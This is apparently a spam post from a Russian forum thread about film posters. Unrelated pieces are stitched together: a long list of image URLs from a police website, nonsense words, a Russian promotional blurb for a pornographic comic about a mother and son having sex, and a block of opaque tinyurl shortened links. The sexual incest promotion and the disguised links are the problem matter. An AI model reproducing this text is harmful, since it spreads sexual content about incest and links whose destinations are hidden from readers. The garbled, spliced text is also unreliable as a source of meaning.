https://21.mvd.ru/upload/site24/document_images/hoyrtQK0Dx-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/G5rRlgajiW-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/VhrmYUhZi8-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/AEzMlnwguN-800x600.jpg
https://21.mvd.ru/upload/site24/b31d9a2eec4967471b17ed3c9110b853-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/8pLxvx4qDp-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sBR7bYMjiC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/HaA51rI9eq.jpg
https://21.mvd.ru/upload/site24/document_images/j1TVEdmyZQ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/hW9gTat2KF.jpg
https://21.mvd.ru/upload/site24/document_images/MCXiUxQjMp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/EaB8gLWAd5.jpg
https://21.mvd.ru/upload/site24/document_images/xS6ikpVber-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/89qFZamKJ9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3nTqsMkh5R-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/DxVTSGSfnB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/njbXZMfhEN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mRLofgwaCB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7ToR7sab6e-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9-188xx140.jpg
https://21.mvd.ru/upload/site24/5620da0e558245e130e296ed6bd79412-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/fDv0RD0VVg.jpg
https://21.mvd.ru/upload/site24/document_images/89qFZamKJ9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ubO0D0Wf7n-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ockZwoqsgI-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FJhONRG8uU-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/P2pMn4D1PL-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/0WeO4JOYzD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Bjjtmfk5DX-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/YazcEm2nJk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/36VqOAf0g7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/HaiOOTAsmw-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/cgeIeGGhmS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BzJ2owks5z.jpg
https://21.mvd.ru/upload/site24/document_images/FxN3iUBEaX-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/N5ocbJ5Fr3-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/zDnlJlxWe0-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/rRbA1VkwOt-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bjjtmfk5DX-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sV5IqJlElE.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/CpGBhIeaq5.jpg
https://21.mvd.ru/upload/site24/document_images/Jg5woRhaps-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tMSFH2rLZ4-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QyAX8U7Ep2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/uzW4VX8Ct0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/KS4HEZNCmi.jpg
https://21.mvd.ru/upload/site24/document_images/3QADp9DBRP.jpg
https://21.mvd.ru/upload/site24/document_images/7R9djNck85-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/SsQeRMkA6e.jpg
https://21.mvd.ru/upload/site24/document_images/9jqkArZF4c-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR.jpg
https://21.mvd.ru/upload/site24/document_images/JaB7iH9ioB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zQroGDpJ3m-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/3YdRBbUFE3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yGMAllymQL-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/4d8lO3ugS4-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3YdRBbUFE3.jpg
https://21.mvd.ru/upload/site24/document_images/Jq3EnB7cGA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/3YdRBbUFE3-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6Oz5oRvhrg.jpg
https://21.mvd.ru/upload/site24/document_remember/1qnm3nbIXF-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim.jpg
https://21.mvd.ru/upload/site24/document_images/utFlx0Af8E-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/MnxtmNbnP0-300x300.jpg
https://21.mvd.ru/upload/site24/document_images/SsQeRMkA6e-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xCbcyKpGkB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-207xx201.jpg
https://21.mvd.ru/upload/site24/document_remember/a430qOZoNH-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/D7azMNTYgC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fDv0RD0VVg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/f7DiduosrT-88xx88.png
https://21.mvd.ru/upload/site24/document_images/Al3SZhE64i-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9.jpg
https://21.mvd.ru/upload/site24/document_images/2pNblPawOh-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/36VqOAf0g7.jpg
https://21.mvd.ru/upload/site24/document_images/T4taA5j1CV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9jqkArZF4c-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/IHeL04WW4M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ds72m8UdPG.jpg
https://21.mvd.ru/upload/site24/document_video/image/I9d33RXugg-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/deJNmnavsH.jpg
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/fP9bdG4EXX.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/TC4yZmsqnd.jpg
https://21.mvd.ru/upload/site24/document_images/Ssnehdq9AG-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N-800x600.jpg

Avudu

19

Leferu

Секс комикс Супер женщина. Эпизод первый
Будьте знакомы, это очаровательная зрелая домохозяйка по имени Кендра. Днем она заботливая домохозяйка и женщина супергерой по вечерам, зовут которую Грудодевушкой. Но это еще не все. В городе проживает злодей, имя которому Членобой, а самое поразительное, что он является сыном Кендры, но они друг о друге даже не подозревают, правда, между ними случился секс…
https://tinyurl.com/otqf8zp#023574.jpg
https://tinyurl.com/pd3yje6#020854.jpg
https://tinyurl.com/or7j53s#011801.jpg
https://tinyurl.com/qx7vzvw#032641.jpg
https://tinyurl.com/nkbuy3p#07655.jpg
https://tinyurl.com/onc8geg#017377.jpg
https://tinyurl.com/owqg735#030758.jpg
https://tinyurl.com/nvgo52c#013272.jpg
https://tinyurl.com/q9m69kl#011130.jpg
https://tinyurl.com/oo872oo#01791.jpg
https://tinyurl.com/qx8kf48#024502.jpg
https://tinyurl.com/p98cqu3#017291.jpg
https://tinyurl.com/nshc2n8#04150.jpg
https://tinyurl.com/pjw22q7#024099.jpg
https://tinyurl.com/o38xdyw#032454.jpg
https://tinyurl.com/osopxhr#05161.jpg
https://tinyurl.com/opl6bga#07207.jpg

Jumip


Вы здесь » Обмен зарубежными сериалами » Забавные фото и картинки » Новые плакаты на старые фильмы